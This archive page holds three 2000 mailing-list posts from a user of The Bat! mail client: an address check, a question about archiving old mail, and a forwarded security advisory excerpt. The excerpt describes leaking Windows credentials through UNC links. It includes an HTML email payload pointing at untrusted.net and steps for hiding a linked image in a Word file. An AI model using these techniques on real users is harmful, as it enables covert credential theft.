Just checking

2000-12-15 Thread Lawrence Kalmakoff 



  I wanted to make sure that I wrote down your e-mail address correctly.


Lawrence
mailto:[EMAIL PROTECTED]



-- 
--
View the TBUDL archive at http://tbudl.thebat.dutaint.com
To send a message to the list moderation team double click here:
   mailto:[EMAIL PROTECTED]
To Unsubscribe from TBUDL, double click here and send the message:
   mailto:[EMAIL PROTECTED]
--

You are subscribed as : archive@jab.org

Archiving old mail messages

2000-07-20 Thread Lawrence Kalmakoff 



  I'm sure this subject has probably been discussed at one time, but I
  can't find anything on it.

  It's a simple situation and the answer will probably involve filters
  or some such thing but here goes anyway:

  In the short time that I have been using TB!, I have managed to
  accumulate over 6000 messages, some of which I would like to off-load
  to an archive-type file.  One of the few features that I liked about
  Outlook 98 was its ability to archive old/selected messages.  I have
  tried exporting the messages but that gave me hundreds of individual
  message files cryptically numbered 1 ... infinity - not a good plan. I
  creating other folders and moving the files that way but then the
  folders are still in my folder list and TB! has to deal with them each
  time it loads.  I haven't experienced any performance problems and I
  don't anticipate any for some time, I would just like to clean up the
  clutter.

  What have users been doing (if anything) to off-load old messages
  while still being able to view them, if necessary?


Lawrence
TB! 1.45 Beta/11

mailto:[EMAIL PROTECTED]

 S/MIME Cryptographic Signature

Fwd: Re: Graphics?

2000-05-19 Thread Lawrence Kalmakoff 
 to set up the guest
 account with no password to allow anonymous access to the server. Windows
 will always try the cached credentials first. When the cached credentials
 fail, a server will silently allow anonymous access and deliver the file.

 IE will also take the UNC path format \\untrusted.net\share\pixel.gif.
 Netscape (4.05) will not use this format.

  Mail based attack:

 Since most major mail programs on Windows support HTLM email using either
 the Netscape or IE engine for display, this same attack can be delivered
 by email. An HTML message with the following:
 BODY background=file://untrusted.net/share/pixel.gif bgColor=#ff
 NOSEND="1"
 Will activate the attack when the user opens or previews the message. The
 NOSEND attribute will probably keep Outlook from embedding the file in the
 email message. This will ensure that the link is forwarded if the mail is
 clever enough to get the initial recipient to forward it.

 Obviously the mail-based version has the benefit of being directed at
 targets. This has been successfully used during field-testing.

  Document based attack:

 Links can also be placed in Microsoft Word documents. To do this, open a
 word document, choose Insert:Picture:From File. In the dialog box type the
 UNC path for the file name. Check "Link to File" and uncheck "Save with
 Document". Word does not accept the file:// URL.

 This linking does not require any macros to run. If a small white graphic
 is used the viewer will have no idea it is in the document.

 Excel does not allow picture embedding in the same way.

 Windows 95 downgrading LANMAN authentication:

 According to Microsoft TechNet Bulletin Q165403, Windows 95 versions up to
 and including OEM SR 2.1 can be tricked into downgrading authentication to
 plaintext passwords. There is an update for W95 available. See:
 http://support.microsoft.com/support/kb/articles/Q165/4/03.ASP
 http://support.microsoft.com/support/kb/articles/Q165/4/03.ASP for
 details. Without that patch these systems are extremely vulnerable.
 Enterprises running W95 should verify their configurations. W98, NT4 sp3
 or later and W2K are not vulnerable to plaintext downgrading.

major snip


Lawrence Kalmakoff
Ottawa, Ontario
DH/DSS Key ID: 0xA99FCC5F

-- 
--
View the TBUDL archive at http://tbudl.thebat.dutaint.com
To send a message to the list moderation team double click here:
   mailto:[EMAIL PROTECTED]
To Unsubscribe from TBUDL, double click here and send the message:
   mailto:[EMAIL PROTECTED]
--

You are subscribed as : archive@jab.org